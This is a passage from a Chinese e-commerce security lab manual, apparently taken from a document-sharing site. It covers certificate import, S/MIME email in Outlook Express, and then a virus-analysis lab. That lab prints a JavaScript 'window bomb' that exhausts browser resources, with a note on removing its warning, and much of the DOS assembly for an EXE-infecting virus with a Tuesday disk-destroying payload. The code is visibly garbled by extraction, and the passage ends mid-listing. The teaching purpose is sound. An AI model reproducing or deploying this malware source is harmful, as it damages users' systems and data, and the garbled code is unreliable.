电子商务安全技术实验讲义指导书内容摘要:

书导出后文件的文件名和路径(如图 9)。 16 此时显示前面你所选择的所有设置,如果觉得完全正确则点击 “完成 ”,如有错误则点击 “上一步 ”(如图 10)。 导入证书及私钥的操作步骤。 打开一个 IE 浏览器,工具 —Inter 选项 —内容 —证书(如图 11)。 或者,开始 —设置 —控制面板 —Inter 选项 —内容 —证书(如图 11)。 17 点击 “导入 ”按钮,此时会弹出证书导入向导(如图 12)。 点击 “下一步 ”,根据向导提示选择导入证书的文件名和路径(如图 13)。 18 选择好以后点击 “下一步 ”,此时为保护你的私钥需要为你导入的证书的私钥键入一个密码(如图 14)。 此时需要选择导入证书的存储区,可以由系统自动选择也可以由用户指定(如图 15),系统默认该证书是用户自己的证书而存入 “个人证书 ”之中,而如果你要导入对方的证书(这主要发生在你要利用对方证书给对方发送加密邮件的时候),则应该自己指定位置并选择 “其他人 ”。 19 此时显示前面你所选择的所有设置,如果觉得完全正确则点击 “完成 ”,如有错误则点 击 “上一步 ”(如图 16)。 (三)、利用数字证书对电子邮件进行数字签名和加密 使用 Outlook Express 可以对电子邮件进行加密和数字签名。 对电子邮件进行签名需要一个属于你自己的数字证书,而要对电子邮件进行加密则需要拥有对方的数字证书。 配置 Outlook,建立你自己的账号 ( 1)在 Outlook Express 中单击菜单上的 “工具 ”—“账号 ” 20 ( 2)点击 “添加 ”“邮件 ” ( 3)输入显示名称 21 ( 4)输入电子邮件地址 ( 5)设置接收邮件服务器和发送邮件服务器 ( 6)输入电子邮箱的帐户名称和登录密码。 22 单击 “下一步 ”,邮件设置成功。 ( 7)在 Outlook Express中,单击 “工具 ”菜单中的 “帐户 ”。 ( 8)选取 “邮件 ”选项卡中用于发送安全邮件的帐号,然后单击 “属性 ”。 在属性设置窗口中,选择 “服务器 ”选项卡,勾选 “我的服务器要求身份验证 ”。 23 ( 9)选取安全选项卡,选择签名证书和加密证书及算法。 ( 10)在弹出的 “选择默认帐户数字标识 ”窗口中,选择 要使用的数字证书。 单击 “确定 ”按钮,完成证书设置。 ( 11)其他补充设置 24 如果你希望在服务器上保留邮件副本,则在帐户属性中,单击 “高级 ”选项卡。 勾选 “在服务器上保留邮件副本 ”。 此时下边设置细则的勾选项由禁止(灰色)变为可选(黑色)。 使用 Outlook 发送附数字签名的电子邮件 ( 1)单击 Outlook Express 窗口中的 “新邮件 ”按钮,撰写新邮件内容,填写好收件人邮箱地址和邮件主题。 选取 “工具 ”菜单中的 “数字签名 ”项或工具条上的 “签名 ”按钮,在邮件收件人的右侧会出现一个红色的 “签名 ”标牌,如图所示。 ( 2)点击新邮件窗口左边的 “发送 ”按钮。 发出带签名的电子邮件。 25 ( 3)当收件人收到并打开有数字签名的邮件时,将看到 “数字签名邮件 ”的提示信息(用户可以设置下次不提示该信息),按 “继续 ”按钮后,才 可阅读到该邮件的内容。 若邮件在传输过程中被他人篡改或发信人的数字证书有问题,页面将出现 “安全警告 ”提示。 在收件箱中,当邮件未阅读或签名未检查时,签名证书标志出现在未拆封信封图标(在发件人姓名前)的右侧;当双击邮件进行安全检查后,证书标志出现在已拆封的信封图标的左侧。 使用 Outlook 发送加密的电子邮件 ( 1)要发送加密电子邮件,你需要有收件人的数字证书。 获得收件人数字证书的方法可以是让对方给你发送带有其数字签名的邮件。 将该邮件打开后,在会右边看到对方的证书标志。 单击该标识,找到 “安全 ”项,单击 “查看 证书 ”按钮,可以查看 “发件人证书 ”;单击 “添加到通讯簿 ”按钮,在通讯簿中保存发件人的加密首选项,这样对方数字证书就被添加到你的通讯簿中。 有了对方的数字证书,你就可以向对方发送加密邮件了。 26 ( 2)在 Outlook Express 6中撰写新邮件或者回复已经收到的邮件,写好邮件内容后,选取 “工具 ”菜单中的 “加密 ”项或单击工具栏上的 “加密 ”按钮,邮件的右侧将会出现一个蓝色的锁型加密标识。 该邮件也可以同时使用发件人的数字签名。 ( 3)当收件人收到并打开已加密过的邮件时,将看到 加密邮件 的提示信息,按 “继续 ”按钮后,可阅读到该邮件的内容。 当收到加密邮件时,完全有理由确认邮件没有被其他任何人阅读或篡改过,因为只有在收件人自己的计算机上安装了正确的数字证书, Outlook Express 才能自动解密电子邮件;否则,邮件内容将无法显示。 27 实验五 计算机病毒 实验 【实验目的】 通过实验,巩固学生对计算机病毒的基本知识的理解,掌握计算机病毒的基本机制。 通过分析常见病毒的源代码及实现机制,了解计算机病毒的特征 、运行结构和破坏机制,理解病毒的实现技术,在此基础上掌握合理且具针对性的防范措施。 【实验学时】 2 学时。 【实验内容和步骤】 对下列病毒原代码进行分析: “窗口炸弹”的源代码 HTML HEAD TITLE炸弹来也 /TITLE META HTTPEQUIV=ContentType CONTENT=text/html。 CHARSET=GB2312 /HEAD BODY onload=WindowBombDemo() SCRIPT LANGUAGE=JavaScript alert(39。 39。 如果你想避免炸弹的爆炸,给你一个机会试试:同时按动 Ctrl+Alt+Del 可能避免它的爆炸,如果你单击〖确定〗按钮则炸弹立刻爆炸。 39。 ) function WindowBombDemo() { var iCounter = 0 while (true) { (: //,CRASHING + iCounter,width=1,height=1,resizable=no) iCounter++ } } /SCRIPT /BODY /HTML HTML HEAD 当对方双击该网页文件后就会启动 IE 浏览器,正在使用的浏览器窗口如雪崩般的增加,直至耗尽所有的资源。 该程序是一个模拟程序,在运行之前会指示用户可以使用 Ctrl + Alt + Del 键避免“窗口炸弹”的爆炸。 如图: 28 真正的病毒程序将删除程序中的以下语句: alert(39。 39。 如果你想避免炸弹的爆炸,给你一个机会试试:同时按动 Ctrl+Alt+Del 可能避免它的爆炸,如果你单击〖确定〗按钮则炸弹立刻爆炸。 39。 ), “窗口炸 弹”就会立刻爆炸。 “窗口炸弹”所产生的无数窗口大约 3 厘米见方,既不能最大化也不能继续显示网页内容,只是雪片般飞来充斥浏览器的窗口中。 对文件型病毒源代码进行分析 CODE SEGMENT assume cs:code .386 100h start: mov cs:oldsp,sp。 保存原程序的堆栈指针 mov cs:oldss,ss。 mov sp,stack_end mov ax,cs。 设置新的堆栈指针 mov ss,ax。 push ds。 保存原 ds es push es。 mov ds,ax mov es,ax sub ax,oldseg。 算出原程序的入口 push ax。 并保存入栈 push oldip。 call setfile。 程序的核心部分 pop cs:oldip。 取回原程序的入口 pop cs:oldseg。 pop es。 恢复原 es ds pop ds。 29 mov sp,cs:oldss。 恢复原 ss,sp mov ss,sp。 mov sp,cs:oldsp。 push oldseg。 跳回原程序入口点 push oldip。 retf。 db 09ah getdate proc near。 这个函数是取得时间是否是星期二是则破坏硬盘数据 mov ax,0ec32h。 写要执行的代码 int 13h not ax。 到 @dest1 位置 mov si,@des1。 这里既加密代码 mov word ptr [si],ax。 mov ah,2ah int 21h cmp al,2 jnz @gd_con mov ax,312h mov cx,1 mov dx,80h @des1: db 0ebh db 32 ret @gd_con: ret getdate endp setfile1 proc near call findfirst @sf_con: jc @sf_back call modify call findnext jmp @sf_con @sf_back: ret setfile1 endp setdata proc near push si push di push cx push ax pushf 30 mov si,offset normal1 mov di,si mov cx,23h @aaa2: lodsb not ax stosb loop @aaa2 popf pop ax pop cx pop di pop si ret setdata endp setfile proc near cmp ax,127h。 没有作用只是干挠 jnz @aaa1。 ax 不可能等于 127h call dword ptr oldsp。 ret。 db 0e8h。 @aaa: call getdate ret @aaa1: mov ah,01ah。 设置磁盘传输地址 mov dx,offset dta。 用于 findfirst int 21h。 call setdata。 数据解密 push @aaa mov dx,offset normal1。 找 *.exe mov ax,offset dta add ax,01eh mov fs,ax。 fs 用于传递文件名的地址 call setfile1。 传染文件 mov dx,offset normal2。 找 *. call setfile1 mov dx,offset bootcmd。 找 c:\windows\ mov fs,dx call setfile1 mov dx,offset bootcmd1。 找 c:\ mov si,dx。 mov word ptr [si],39。 :C39。 mov fs,dx。 31 call setfile1。 ret setfile endp db 09ah findfirst proc near mov ax,04e27h int 21h ret findfirst endp findnext proc near mov ah,04fh int 21h ret findnext endp modify proc near。 修改并感染程序 mov si,offset sbuffer。 可执行的文件头的地址 mov di,offset dta。 文件信息的地址 cmp dword ptr [di+01ah],1000。 若文件小于 1K 或 大于 1M 不感染 jb @fn_ret。 cmp dword ptr [di+01ah],0ffcffh。 jae @fn_ret。 mov dx,fs mov ax,4300h。 保存原文件属性 int 21h。 再改为没有属性 push cx。 mov ax,4301h xor cx,cx int 21h mov ax,03d02h。 打开文件 int 21h。 jc @fn_ret3。 mov bx,ax。 读文件头 mov ah,03fh。 mov cx,1ch。 mov dx,offset sbuffer。 int 21h。 cmp word ptr [si],39。 ZM39。 如不是可执行文件就不感染 jnz @fn_ret1。 mov ax,word ptr [si+014h]。 保存原程序入口 mov oldip,ax。 mov ax,word ptr [si+016h]。 mov oldseg,ax。
阅读剩余 0%
本站所有文章资讯、展示的图片素材等内容均为注册用户上传(部分报媒/平媒内容转载自网络合作媒体),仅供学习参考。 用户通过本站上传、发布的任何内容的知识产权归属用户或原始著作权人所有。如有侵犯您的版权,请联系我们反馈本站将在三个工作日内改正。